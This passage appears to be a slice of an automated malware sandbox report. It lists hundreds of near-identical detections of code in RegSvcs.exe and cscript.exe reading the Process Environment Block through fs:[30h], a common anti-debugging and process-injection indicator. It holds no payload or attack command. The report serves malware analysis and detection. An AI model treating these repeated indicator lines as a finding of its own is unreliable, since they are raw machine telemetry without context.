            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A14FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B8CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B8F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016237F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F8794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01667794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01667794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01667794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0169FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01618E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EE620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016116E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01628EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0169FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016136CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B8ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016646A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04863884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04863884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048290AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B8CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A14FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04866CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04866CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04866CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04866C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04866C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04866C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04866C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04867016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04867016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04867016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04800050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04800050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A2073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B1074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048135A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048161A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048161A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04811DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04811DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04811DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048741E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04898DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04804120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04804120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04804120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04804120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04804120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0486A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04814D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04814D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04814D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B8D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04823D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04863540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04807D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0480C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0487FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047F766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0481D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0481D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_048646A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_048B0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_048B0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_048B0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0481FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047E9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047E9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047E9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047E9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_04828EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0489FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_048136CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_048B8ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047EE620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_048116E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047F8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047EC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047EC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047EC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_04803A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047F76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0481A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0481A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0489FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047FAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047FAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_04874257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047E52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047E52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047E52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047E52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047E52A5 mov eax, dword ptr fs:[00000030h]
